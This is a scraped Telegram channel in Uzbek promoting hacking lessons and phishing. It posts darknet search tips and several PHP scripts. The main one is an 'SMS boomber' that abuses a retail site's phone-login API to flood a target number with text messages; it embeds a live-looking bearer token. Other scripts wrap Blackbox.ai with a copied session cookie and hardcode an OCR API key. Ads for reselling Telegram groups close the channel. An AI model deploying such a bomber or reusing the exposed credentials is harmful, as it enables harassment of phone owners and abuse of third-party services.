Channel
114 subscribers
42 photos
13 videos
51 files
57 links
Hackerlik darslar
Phishing
Saytlarni buzish
Va qiziqarli Ma'lumotlar
Download Telegram
Channel
Tor browser tortib turilar play marketdan
Tor browserga kirib safest yoqing va oninland deb qidirasiz va birinchi chiqgan saytga kirasiz u sayt Google ga o'xshagan lekin darknet qidiruv sayti. Hoxlagan narsangizni yozib qidirasiz bo'ladi.
https://t.me/+eHeA9n91USNjZjhi

Qo'shilib qo'yilar birga ishlaymiz
smsboomber.php
5 KB
Sms boomber 6 ta saytdan sms yuboradi

Guruhga qo'shilib qo'yilar

https://t.me/+eHeA9n91USNjZjhi
<?php
if (!isset($_GET['num'])) {
die("Telefon raqam kiritilmagan! Foydalanish: index.php?num=998940450529");
}

$phone = preg_replace('/\D/', '', $_GET['num']); // faqat raqamlar
if (strlen($phone) != 12 || substr($phone, 0, 3) != "998") {
die("Noto‘g‘ri format! To‘liq formatda yuboring: 998901234567");
}

$url = "https://api.birbir.uz/api/frontoffice/1.3.2.0/auth/enter-by-phone";
$data = json_encode(["phone" => (int)$phone]);

$headers = [
"Host: api.birbir.uz",
"content-length: " . strlen($data),
"sec-ch-ua-platform: \"Android\"",
"x-current-language: ru",
"authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJFUzUxMiJ9.eyJqdGkiOiI4NWVkMzdkZC00MDY4LTRkYTctYWI0OC1jMzkwNmJkYTYzMzgiLCJpYXQiOjE3NTQ0Mzg0NzUsImV4cCI6MTc1NDQ1Mjg3NSwidSI6IjIyMTdmNDIyLWRlMWQtNDFkNy04ZmUyLWQ1YzY2YzU2MjkwYSIsInV0IjoxMSwiaXAiOiIxODguMTEzLjIzMC4yMjciLCJ0IjoxLCJkdCI6IjIwMjUtMDgtMDZUMDA6MDE6MTUuOTk4Mjg1WiIsImRpIjp7InV1aWQiOiI5ZDI5MTViMi1mZjY5LTQyY2QtYjlhNi04NzhlNzE1ZmRmYzYiLCJvcyI6IkFuZHJvaWQgMTMiLCJuYW1lIjoiR29vZ2xlIFBpeGVsIDciLCJhY2NlcHRMYW5ndWFnZSI6InV6In0sInYiOiIxLjMuMi4wIn0.ACWsnkRzbgyohLgsPaRJ6O24w5TDggXXfXP2O5rCm7sOS_rSUCtqk0G31zx55uYQ0K-s0x-IjuL3CL4AS5f3n-5HAN5eBXuRgrP6y6_QzapmVpjPPaZMv5W9QSkc43z559kzbEvK_MWHVEB-JDT-SG2ojVchTiO-S4lEhOt8BXQ505En",
"sec-ch-ua: \"Not)A;Brand\";v=\"8\", \"Chromium\";v=\"138\", \"Android WebView\";v=\"138\"",
"sec-ch-ua-mobile: ?1",
"user-agent: Mozilla/5.0 (Linux; Android 13; Pixel 7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36",
"accept: application/json, text/plain, */*",
"x-current-region: all",
"content-type: application/json",
"origin: https://birbir.uz",
"x-requested-with: mark.via.gp",
"sec-fetch-site: same-site",
"sec-fetch-mode: cors",
"sec-fetch-dest: empty",
"accept-encoding: gzip, deflate, br, zstd",
"accept-language: uz-UZ,uz;q=0.9,en-US;q=0.8,en;q=0.7",
"priority: u=1, i"
];

$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_ENCODING, ""); // br, gzip, deflate qo‘llab-quvvatlash

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

header('Content-Type: application/json');
echo json_encode([
"status" => $http_code,
"phone" => $phone,
"response" => json_decode($response, true)
]);
?>

Bir Bir sms api ishlatish quyidagicha index.php?num=998901234567
<?php
header("Content-Type: application/json; charset=UTF-8");

function instagram($url){
$dev_208 = curl_init();
curl_setopt($dev_208, CURLOPT_URL, 'https://api.instasave.website/media');
curl_setopt($dev_208, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($dev_208, CURLOPT_HTTPHEADER,
'Content-Type: application/x-www-form-urlencoded',
'User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Mobile Safari/537.36',
'Referer: https://instasave.website/download');
curl_setopt($dev_208, CURLOPT_POSTFIELDS, 'url='.$url.'&lang=en');
$result = curl_exec($dev_208);

preg_match_all("/\"https:\/\/[^\s]*?\"/",$result, $array);
$pic_str = str_replace('\"', "", $array[0][0]);
$photo= str_replace('"', "", $pic_str);
$vid_str = str_replace('\"', "", $array[0][1]);
$video= str_replace('"', "", $vid_str);

$array = array("video"=>$video,"photo"=>$photo);
return $array;
}

if($_GET['url']==null){
echo "Url kiriting!";
}else{
$data = instagram($_GET['url']);
echo json_encode($data,JSON_UNESCAPED_UNICODE | JSON_PRETTY_PRINT | JSON_UNESCAPED_SLASHES);
}

curl_close($dev_208);
?>


Instagram download api
https://68656dad1fa44.myxvest1.ru/test/ai/api.php?ask=salom

Blackbox.ai parse qildim kodni kechroq tashlab qo'ya man ishlatib ko'rilar
<?php
header("Content-Type: application/json; charset=utf-8");

if (isset($_GET["ask"]) && !empty($_GET["ask"])) {
$userMessage = trim($_GET["ask"]);

$url = "https://www.blackbox.ai/api/chat";

$data = [
"messages" => [
[
"role" => "user",
"content" => $userMessage,
"id" => uniqid()
]
],
"id" => uniqid(),
"previewToken" => null,
"userId" => null,
"codeModelMode" => true,
"trendingAgentMode" => (object)[],
"isMicMode" => false,
"userSystemPrompt" => null,
"maxTokens" => 1024,
"userSelectedAgent" => "VscodeAgent",
"validated" => "a38f5889-8fef-46d4-8ede-bf4668b6a9bb",
"imageGenerationMode" => false,
"imageGenMode" => "autoMode",
"webSearchModePrompt" => false,
"deepSearchMode" => false,
"customProfile" => [
"name" => "",
"occupation" => "",
"traits" => [],
"additionalInfo" => "",
"enableNewChats" => false
],
"webSearchModeOption" => [
"autoMode" => true,
"webMode" => false,
"offlineMode" => false
],
"session" => null,
"isPremium" => false,
"subscriptionCache" => null,
"beastMode" => false,
"reasoningMode" => false,
"designerMode" => false,
"workspaceId" => "",
"asyncMode" => false,
"integrations" => (object)[],
"isTaskPersistent" => false,
"selectedElement" => null
];

$headers = [
"Content-Type: application/json",
"Origin: https://www.blackbox.ai",
"Referer: https://www.blackbox.ai/",
"Accept: */*",
"User-Agent: Mozilla/5.0",
"x-requested-with: mark.via.gp",
"Cookie: sessionId=518e7795-8db0-4732-aaa1-d1b4304cfbca; render_app_version_affinity=dep-d29kn4qdbo4c73blcd0g"
];

$ch = curl_init($url);
curl_setopt($ch, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_2_0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);

$response = curl_exec($ch);

if (curl_errno($ch)) {
http_response_code(500);
echo json_encode(["error" => curl_error($ch)]);
} else {
echo $response;
}

curl_close($ch);
} else {
http_response_code(400);
echo json_encode(["error" => "Iltimos, `ask` GET parametri yuboring, masalan: ?ask=salom"]);
}
?>


Blackbox.ai api kodi
<?php
$botToken = "YOUR_TELEGRAM_BOT_TOKEN";
$ocrApiKey = "K86614560388957";
$content = file_get_contents("php://input");
$update = json_decode($content, true);

if (!isset($update["message"])) exit();
$message = $update["message"];
$chatId = $message["chat"]["id"];

// /start
if (isset($message["text"]) && $message["text"] === "/start") {
sendMessage($chatId, "👋 Assalomu alaykum!\n\n📸 Iltimos, rasm yuboring. Men rasm ichidagi matnni matnga aylantirib beraman.");
exit();
}


if (isset($message["photo"])) {
$fileId = end($message["photo"])["file_id"];
$filePathData = json_decode(file_get_contents("https://api.telegram.org/bot$botToken/getFile?file_id=$fileId"), true);
$filePath = $filePathData["result"]["file_path"];
$fileUrl = "https://api.telegram.org/file/bot$botToken/$filePath";

// Rasmni saqlash
$imgDir = __DIR__ . "/img/";
if (!is_dir($imgDir)) mkdir($imgDir);
$imgPath = $imgDir . "img" . $chatId . ".jpg";
file_put_contents($imgPath, file_get_contents($fileUrl));


$text = ocrImage($imgPath, $ocrApiKey);
sendMessage($chatId, $text ?: " Matn topilmadi yoki xatolik yuz berdi.");

// 15 soniyadan song rasmni o‘chirish
register_shutdown_function(function () use ($imgPath) {
sleep(15);
if (file_exists($imgPath)) unlink($imgPath);
});

} else {
sendMessage($chatId, "📤 Iltimos, rasm yuboring. Men uning ichidagi matnni aniqlayman.");
}

function ocrImage($imagePath, $apiKey) {
$url = 'https://api.ocr.space/parse/image';
$postData = [
'apikey' => $apiKey,
'language' => 'eng',
'isOverlayRequired' => 'false',
'file' => new CURLFile($imagePath)
];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);
$response = curl_exec($ch);
curl_close($ch);
$result = json_decode($response, true);
return $result['ParsedResults'][0]['ParsedText'] ?? null;
}


function sendMessage($chatId, $text) {
global $botToken;
$url = "https://api.telegram.org/bot$botToken/sendMessage";
$data = [
'chat_id' => $chatId,
'text' => $text,
'parse_mode' => 'HTML'
];
file_get_contents($url . "?" . http_build_query($data));
}
?>

Rasmdan matn ajrarib beradigan bot kodi api limiti yo'q
🤖: @TezApiUzBot - Sifatli, hamyonbop API xizmatlari!

⚡️ Hoziroq foydalanishni boshlang homiylik hamkorlik bizni qollab quvvatlang!

👥 Do'stlaringizga ulashing!
1
Media is too big
VIEW IN TELEGRAM
Web sayt parse qilish, video muallifi rakuzen
2024 yil 1-2 oy ochilgan guruhlar ola man 25 ming. 2023 guruhlar 70 ming
2022 guruh 80 ming
Sotmoqchi bo'lganlar @asilbek_zokirov ga yozsin
https://68656dad1fa44.myxvest1.ru/translate/tts.php?text=Salom%20qalaysan&lang=en

TTS yani text to speach api
en o'rniga o'zingiz hoxlagan tilni kiritasiz masalan ru, kz va boshqa qillar
https://68656dad1fa44.myxvest1.ru/test/ai/api.php?ask=salom

ai api (yani suniy intellekt api)
Salom so'zi o'rniga har qanday so'z yozish mumkin
Assalomu Aleykum biz ishga tushdik @TezStarts_robot orqali arzon starts sotib oling va sovg'alar yutib oling
Forwarded from Tez Stars
Aksiya faqar bugun 50 stars 11ming so'm.
@TezStarts_robot